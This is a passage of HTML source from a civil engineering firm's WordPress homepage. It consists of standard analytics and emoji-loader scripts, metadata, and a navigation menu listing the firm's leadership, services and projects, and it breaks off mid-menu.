<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" /> <link rel="shortcut icon" href="http://www.nitscheng.com/wp-content/themes/nitscheng/favicon.ico" /> <title>Home - Nitsch Engineering</title> <!-- This site is optimized with the Yoast SEO plugin v9.2.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="http://www.nitscheng.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - Nitsch Engineering" /> <meta property="og:description" content="Meet Nitsch Here at Nitsch Engineering our civil," /> <meta property="og:url" content="http://www.nitscheng.com/" /> <meta property="og:site_name" content="Nitsch Engineering" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Meet Nitsch Here at Nitsch Engineering our civil," /> <meta name="twitter:title" content="Home - Nitsch Engineering" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/www.nitscheng.com\/","name":"Nitsch Engineering","potentialAction":{"@type":"SearchAction","target":"http:\/\/www.nitscheng.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Nitsch Engineering &raquo; Feed" href="http://www.nitscheng.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Nitsch Engineering &raquo; Comments Feed" href="http://www.nitscheng.com/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.3.2 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.3.2'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-83016845-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-83016845-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.nitscheng.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.nitscheng.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://www.nitscheng.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1' type='text/css' media='all' /> <link rel='stylesheet' id='main-style-css' href='http://www.nitscheng.com/wp-content/themes/nitscheng/style.css?ver=5.2' type='text/css' media='screen' /> <link rel='stylesheet' id='print-style-css' href='http://www.nitscheng.com/wp-content/themes/nitscheng/print-styles.css?ver=5.2' type='text/css' media='print' /> <link rel='stylesheet' id='loto-google-fonts-css' href='http://fonts.googleapis.com/css?family=Lato%3A400%2C300%2C700%2C900&#038;ver=5.2' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","is_debug_mode":"false","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"","home_url":"http:\/\/www.nitscheng.com","track_download_as":"event","internal_label":"int","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.nitscheng.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.3.2'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.nitscheng.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='http://www.nitscheng.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.nitscheng.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.nitscheng.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='http://www.nitscheng.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.nitscheng.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.nitscheng.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.nitscheng.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.nitscheng.com%2F&#038;format=xml" /> </head> <body class="home page-template-default page page-id-4 loading"> <div id="wrapper"><!--start wrapper--> <div id="page-inner"> <div class="container clearfix"> <div class="center-content"> <header id="header"> <div id="left-header"> <div class="logo"><a href="http://www.nitscheng.com/"><img src="http://www.nitscheng.com/wp-content/themes/nitscheng/images/logo.png" alt="Nitsch Engineering" width="151" height="85" /></a></div> <span class="tagline">Building better communities with you</span> </div> <div id="right-header"> <div class="social-link"> <span><a href="javascript:window.print();">Print Page</a></span> <div class="socila-icon"> <a href="http://facebook.com/nitscheng" target="_blank"><i class="icon-facebook"></i></a> <a href="http://twitter.com/nitscheng" target="_blank"><i class="icon-twitter"></i></a> <a href="http://linkedin.com/company/nitsch-engineering" target="_blank"><i class="icon-linkedin"></i></a> <a href="http://youtube.com/NitschEng" target="_blank"><i class="icon-youtube-play"></i></a> <a href="https://www.instagram.com/nitscheng/" target="_blank"><i class="icon-instagram-icon-black"></i></a> </div> </div> </div> <a href="#" id="mobile-menu-button" class="tablet-view phone-view"> <span class="mobile-menu-label"><span class="mobile-menu-label-inner">Menu</span></span> <span class="mobile-menu-icon"> <span></span> <span></span> <span></span> </span> </a> <div class="clear"></div> </header> </div> </div><!--//end .container--> <div class="container nav-container"><!--start container--> <div class="center-content"> <span class="tagline">Building better communities with you</span> <div id="search-section"> <form action="http://www.nitscheng.com/" method="get"> <input type="text" name="s" id="search" placeholder="Site Search" /> <input type="submit" name="submit" value="search" /> </form> </div> <nav id="nav"> <div class="menu-main-menu-container"><ul id="desktop-menu" class="sf-menu"><li id="menu-item-44" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-44"><a href="http://www.nitscheng.com/about-us/our-mission/">About Us</a> <ul class="sub-menu"> <li id="menu-item-181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-181"><a href="http://www.nitscheng.com/about-us/our-mission/">Our Mission</a></li> <li id="menu-item-180" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-180"><a href="http://www.nitscheng.com/about-us/firm-background/">Firm Background</a></li> <li id="menu-item-153" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-153"><a href="http://www.nitscheng.com/about-us/leadership/">Leadership</a> <ul class="sub-menu"> <li id="menu-item-1106" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1106"><a href="http://www.nitscheng.com/leadership/lisa-a-brothers-pe/">Lisa A. Brothers, PE</a></li> <li id="menu-item-1104" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1104"><a href="http://www.nitscheng.com/leadership/judith-nitsch-pe/">Judith Nitsch, PE</a></li> <li id="menu-item-2198" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-2198"><a href="http://www.nitscheng.com/leadership/deirdra-taylor-cpa/">Deirdra A. Taylor, CPA</a></li> <li id="menu-item-1101" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1101"><a href="http://www.nitscheng.com/leadership/gary-f-pease-pe/">Gary F. Pease, PE</a></li> <li id="menu-item-1100" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1100"><a href="http://www.nitscheng.com/leadership/fayssal-j-husseini-pe/">Fayssal J. Husseini, PE</a></li> <li id="menu-item-1111" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1111"><a href="http://www.nitscheng.com/leadership/scott-d-turner-pe-aicp/">Scott D. Turner, PE, AICP</a></li> <li id="menu-item-1099" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1099"><a href="http://www.nitscheng.com/leadership/emad-a-elsakka-pe/">Emad A. Elsakka, PE</a></li> <li id="menu-item-1098" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1098"><a href="http://www.nitscheng.com/leadership/denis-r-seguin-pls/">Denis R. Seguin, PLS</a></li> <li id="menu-item-1110" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1110"><a href="http://www.nitscheng.com/leadership/sandra-a-brock-pe/">Sandra A. Brock, PE</a></li> <li id="menu-item-1102" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1102"><a href="http://www.nitscheng.com/leadership/john-m-schmid-pe/">John M. Schmid, PE</a></li> <li id="menu-item-1105" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1105"><a href="http://www.nitscheng.com/leadership/laurie-b-strickland/">Laurie B. Strickland</a></li> <li id="menu-item-1096" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1096"><a href="http://www.nitscheng.com/leadership/andres-repetto/">Andres Repetto</a></li> <li id="menu-item-2199" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-2199"><a href="http://www.nitscheng.com/leadership/aaron-gallagher-pe/">Aaron A. Gallagher, PE</a></li> <li id="menu-item-1097" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1097"><a href="http://www.nitscheng.com/leadership/deborah-m-danik-pe/">Deborah M. Danik, PE</a></li> <li id="menu-item-1109" class="menu-item menu-item-type-post_type menu-item-object-leadership menu-item-1109"><a href="http://www.nitscheng.com/leadership/nicole-holmes-pe/">Nicole Holmes, PE</a></li> <li id="menu-item-1112" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1112"><a href="http://www.nitscheng.com/about-us/advisory-committee/">Advisory Committee</a></li> </ul> </li> <li id="menu-item-182" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-182"><a href="http://www.nitscheng.com/about-us/corporate-citizenship/">Corporate Citizenship</a> <ul class="sub-menu"> <li id="menu-item-183" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-183"><a href="http://www.nitscheng.com/about-us/corporate-citizenship/community-involvement/">Community Involvement</a></li> <li id="menu-item-194" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-194"><a href="http://www.nitscheng.com/about-us/corporate-citizenship/charitable-contributions/">Charitable Contributions</a></li> <li id="menu-item-1736" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1736"><a href="http://www.nitscheng.com/about-us/corporate-citizenship/canstruction/">Canstruction</a></li> </ul> </li> <li id="menu-item-184" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-184"><a href="http://www.nitscheng.com/about-us/awards/corporate/">Awards</a> <ul class="sub-menu"> <li id="menu-item-1451" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1451"><a href="http://www.nitscheng.com/about-us/awards/corporate/">Corporate</a></li> <li id="menu-item-185" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-185"><a href="http://www.nitscheng.com/about-us/awards/people/">People</a></li> <li id="menu-item-186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-186"><a href="http://www.nitscheng.com/about-us/awards/projects/">Projects</a></li> </ul> </li> <li id="menu-item-187" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-187"><a href="http://www.nitscheng.com/about-us/educational-offerings/">Educational Offerings</a> <ul class="sub-menu"> <li id="menu-item-188" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-188"><a href="http://www.nitscheng.com/about-us/educational-offerings/client-seminars/">Client Seminars</a></li> <li id="menu-item-190" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-190"><a href="http://www.nitscheng.com/about-us/educational-offerings/lunch-learn/">Lunch &#038; Learn</a></li> <li id="menu-item-189" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-189"><a href="http://www.nitscheng.com/about-us/educational-offerings/introduce-a-girl-to-engineering-day/">Introduce a Girl to Engineering Day</a></li> </ul> </li> <li id="menu-item-191" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-191"><a href="http://www.nitscheng.com/about-us/green-office/">Green Office</a></li> <li id="menu-item-1986" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1986"><a href="http://www.nitscheng.com/about-us/building-better-communities-mid-atlantic/">Building Better Communities with You in the Mid-Atlantic</a></li> </ul> </li> <li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-43"><a href="http://www.nitscheng.com/services/civil-engineering/">Services</a> <ul class="sub-menu"> <li id="menu-item-260" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-260"><a href="http://www.nitscheng.com/services/civil-engineering/">Civil Engineering</a></li> <li id="menu-item-268" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-268"><a href="http://www.nitscheng.com/services/transportation-engineering/">Transportation Engineering</a></li> <li id="menu-item-267" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-267"><a href="http://www.nitscheng.com/services/structural-engineering/">Structural Engineering</a></li> <li id="menu-item-262" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-262"><a href="http://www.nitscheng.com/services/green-infrastructure/">Green Infrastructure</a> <ul class="sub-menu"> <li id="menu-item-263" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-263"><a href="http://www.nitscheng.com/services/green-infrastructure/climate-change-resiliency/">Climate Change &#038; Resilience</a></li> <li id="menu-item-264" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-264"><a href="http://www.nitscheng.com/services/green-infrastructure/stormwater-research-at-uva/">Stormwater Research at UVA</a></li> </ul> </li> <li id="menu-item-266" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-266"><a href="http://www.nitscheng.com/services/planning/">Planning</a></li> <li id="menu-item-265" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-265"><a href="http://www.nitscheng.com/services/land-surveying/">Land Surveying</a></li> <li id="menu-item-261" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-261"><a href="http://www.nitscheng.com/services/gis/">GIS</a></li> </ul> </li> <li id="menu-item-42" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-42"><a href="http://www.nitscheng.com/projects/airports/">Projects</a> <ul class="sub-menu"> <li id="menu-item-305" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-305"><a href="http://www.nitscheng.com/projects/airports/">Airports</a> <ul class="sub-menu"> <li id="menu-item-851" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-851"><a href="http://www.nitscheng.com/project/new-bedford-regional-airport/">New Bedford Regional Airport</a></li> <li id="menu-item-850" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-850"><a href="http://www.nitscheng.com/project/barnstable-municipal-airport/">Barnstable Municipal Airport</a></li> <li id="menu-item-849" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-849"><a href="http://www.nitscheng.com/project/logan-international-airport-realignment-of-taxiway-d/">Logan International Airport, Realignment of Taxiway D</a></li> <li id="menu-item-848" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-848"><a href="http://www.nitscheng.com/project/marthas-vineyard-airport/">Martha&#8217;s Vineyard Airport</a></li> <li id="menu-item-847" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-847"><a href="http://www.nitscheng.com/project/taunton-municipal-airport/">Taunton Municipal Airport</a></li> <li id="menu-item-846" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-846"><a href="http://www.nitscheng.com/project/beverly-airport/">Beverly Airport</a></li> </ul> </li> <li id="menu-item-306" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-306"><a href="http://www.nitscheng.com/projects/bridges/">Bridges</a> <ul class="sub-menu"> <li id="menu-item-2281" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2281"><a href="http://www.nitscheng.com/project/winnetuxet-road-bridge/">Winnetuxet Road Bridge</a></li> <li id="menu-item-2282" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2282"><a href="http://www.nitscheng.com/project/seaboard-solar-bridge-rating/">Seaboard Solar Bridge Rating</a></li> <li id="menu-item-2283" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2283"><a href="http://www.nitscheng.com/project/farlow-park-bridge-and-pond-restoration/">Farlow Park Bridge and Pond Restoration</a></li> <li id="menu-item-2284" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2284"><a href="http://www.nitscheng.com/project/elm-street-bridge/">Elm Street Bridge</a></li> <li id="menu-item-857" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-857"><a href="http://www.nitscheng.com/project/chelsea-street-bridge/">Chelsea Street Bridge</a></li> <li id="menu-item-856" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-856"><a href="http://www.nitscheng.com/project/longfellow-bridge/">Longfellow Bridge</a></li> <li id="menu-item-855" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-855"><a href="http://www.nitscheng.com/project/boston-university-bridge/">Boston University Bridge</a></li> <li id="menu-item-854" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-854"><a href="http://www.nitscheng.com/project/mbta-fairmont-corridor-bridges/">MBTA Fairmont Corridor Bridges</a></li> <li id="menu-item-853" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-853"><a href="http://www.nitscheng.com/project/great-river-bridge/">Great River Bridge</a></li> <li id="menu-item-852" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-852"><a href="http://www.nitscheng.com/project/duck-bridge/">Duck Bridge</a></li> </ul> </li> <li id="menu-item-307" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-307"><a href="http://www.nitscheng.com/projects/commercial/">Commercial</a> <ul class="sub-menu"> <li id="menu-item-2291" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2291"><a href="http://www.nitscheng.com/project/aloft-element-hotels/">Aloft and Element Hotels</a></li> <li id="menu-item-2290" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2290"><a href="http://www.nitscheng.com/project/upper-harbor-terminal/">Upper Harbor Terminal</a></li> <li id="menu-item-2289" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2289"><a href="http://www.nitscheng.com/project/new-bedford-industrial-park/">New Bedford Industrial Park</a></li> <li id="menu-item-388" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-388"><a href="http://www.nitscheng.com/project/seaport-square/">Seaport Square</a></li> <li id="menu-item-389" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-389"><a href="http://www.nitscheng.com/project/fan-pier/">Fan Pier</a></li> <li id="menu-item-390" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-390"><a href="http://www.nitscheng.com/project/liberty-mutual-headquarters/">Liberty Mutual Headquarters</a></li> <li id="menu-item-391" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-391"><a href="http://www.nitscheng.com/project/citysquare/">CitySquare</a></li> <li id="menu-item-392" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-392"><a href="http://www.nitscheng.com/project/jackson-square/">Jackson Square</a></li> <li id="menu-item-393" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-393"><a href="http://www.nitscheng.com/project/renaissance-boston-waterfront-marriott/">Renaissance Boston Waterfront Marriott</a></li> <li id="menu-item-394" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-394"><a href="http://www.nitscheng.com/project/independence-wharf/">Independence Wharf</a></li> <li id="menu-item-395" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-395"><a href="http://www.nitscheng.com/project/harbor-south-tower/">Harbor South Tower</a></li> <li id="menu-item-396" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-396"><a href="http://www.nitscheng.com/project/apple-store/">Apple Store</a></li> <li id="menu-item-397" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-397"><a href="http://www.nitscheng.com/project/genzyme-corporation-warehouse/">Genzyme Corporation Warehouse</a></li> <li id="menu-item-398" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-398"><a href="http://www.nitscheng.com/project/gallery-automotive/">Gallery Automotive</a></li> <li id="menu-item-399" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-399"><a href="http://www.nitscheng.com/project/boston-scientific-warehouse/">Boston Scientific Warehouse</a></li> </ul> </li> <li id="menu-item-308" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-308"><a href="http://www.nitscheng.com/projects/health-care/">Health Care</a> <ul class="sub-menu"> <li id="menu-item-863" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-863"><a href="http://www.nitscheng.com/project/worcester-recovery-center-hospital/">Worcester Recovery Center &#038; Hospital</a></li> <li id="menu-item-862" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-862"><a href="http://www.nitscheng.com/project/beth-israel-deaconess-hospital/">Beth Israel Deaconess Hospital</a></li> <li id="menu-item-861" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-861"><a href="http://www.nitscheng.com/project/heywood-hospital/">Heywood Hospital</a></li> <li id="menu-item-860" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-860"><a href="http://www.nitscheng.com/project/mount-auburn-hospital/">Mount Auburn Hospital</a></li> <li id="menu-item-859" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-859"><a href="http://www.nitscheng.com/project/massachusetts-general-hospital/">Massachusetts General Hospital</a></li> <li id="menu-item-858" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-858"><a href="http://www.nitscheng.com/project/south-end-community-health-center/">South End Community <br>Health Center</a></li> </ul> </li> <li id="menu-item-309" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-309"><a href="http://www.nitscheng.com/projects/higher-education/">Higher Education</a> <ul class="sub-menu"> <li id="menu-item-2298" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2298"><a href="http://www.nitscheng.com/project/ruth-mulan-chu-chao-center-harvard-business-school-2/">Ruth Mulan Chu Chao Center, Harvard Business School</a></li> <li id="menu-item-875" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-875"><a href="http://www.nitscheng.com/project/boston-university/">Boston University</a></li> <li id="menu-item-874" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-874"><a href="http://www.nitscheng.com/project/frick-chemistry-building/">Princeton University, Frick Chemistry Building</a></li> <li id="menu-item-873" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-873"><a href="http://www.nitscheng.com/project/north-shore-community-college/">North Shore Community College, Health &#038; Student Services Building</a></li> <li id="menu-item-872" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-872"><a href="http://www.nitscheng.com/project/mit-campus/">Massachusetts Institute of Technology</a></li> <li id="menu-item-871" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-871"><a href="http://www.nitscheng.com/project/stonehill-college/">Stonehill College, Science Center and Circulation Roadway</a></li> <li id="menu-item-870" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-870"><a href="http://www.nitscheng.com/project/harvard-law-school/">Harvard Law School, Wasserstein Hall and Caspersen Student Center</a></li> <li id="menu-item-869" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-869"><a href="http://www.nitscheng.com/project/kroon-hall-yale-university/">Yale University, Kroon Hall</a></li> <li id="menu-item-868" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-868"><a href="http://www.nitscheng.com/project/school-of-management/">Simmons College, School of Management</a></li> <li id="menu-item-867" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-867"><a href="http://www.nitscheng.com/project/umass-boston/">UMass Boston</a></li> <li id="menu-item-866" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-866"><a href="http://www.nitscheng.com/project/umass-amherst/">UMass Amherst</a></li> <li id="menu-item-865" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-865"><a href="http://www.nitscheng.com/project/boston-college/">Boston College</a></li> <li id="menu-item-864" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-864"><a href="http://www.nitscheng.com/project/north-hall/">Framingham State University, North Hall</a></li> <li id="menu-item-1983" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-1983"><a href="http://www.nitscheng.com/project/washington-lee-university-john-w-elrod-commons/">Washington and Lee University, John W. Elrod Commons</a></li> <li id="menu-item-2431" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2431"><a href="http://www.nitscheng.com/project/harvard-business-school/">Harvard Business School, Stormwater Master Plan</a></li> </ul> </li> <li id="menu-item-310" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-310"><a href="http://www.nitscheng.com/projects/k-12-schools/">K – 12 Schools</a> <ul class="sub-menu"> <li id="menu-item-2366" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2366"><a href="http://www.nitscheng.com/project/west-bridgewater-middle-high-school/">West Bridgewater Middle/High School</a></li> <li id="menu-item-2367" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2367"><a href="http://www.nitscheng.com/project/dr-martin-luther-king-jr-school/">Dr. Martin Luther King, Jr. School</a></li> <li id="menu-item-2368" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2368"><a href="http://www.nitscheng.com/project/lunenburg-middle-high-school/">Lunenburg Middle/High School</a></li> <li id="menu-item-2369" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2369"><a href="http://www.nitscheng.com/project/essex-agricultural-and-technical-school/">Essex Agricultural and Technical School</a></li> <li id="menu-item-2370" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-2370"><a href="http://www.nitscheng.com/project/lowell-high-school-drone-survey/">Lowell High School Drone Survey</a></li> <li id="menu-item-887" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-887"><a href="http://www.nitscheng.com/project/phillips-academy-addison-gallery-of-american-art/">Phillips Academy, Addison Gallery of American Art</a></li> <li id="menu-item-886" class="menu-item menu-item-type-post_type menu-item-object-project menu-item-886"><a href="http://www.nitscheng.com/project/newton-north-high-school/">Newton North High School</a></li> <li id="menu-item-885" 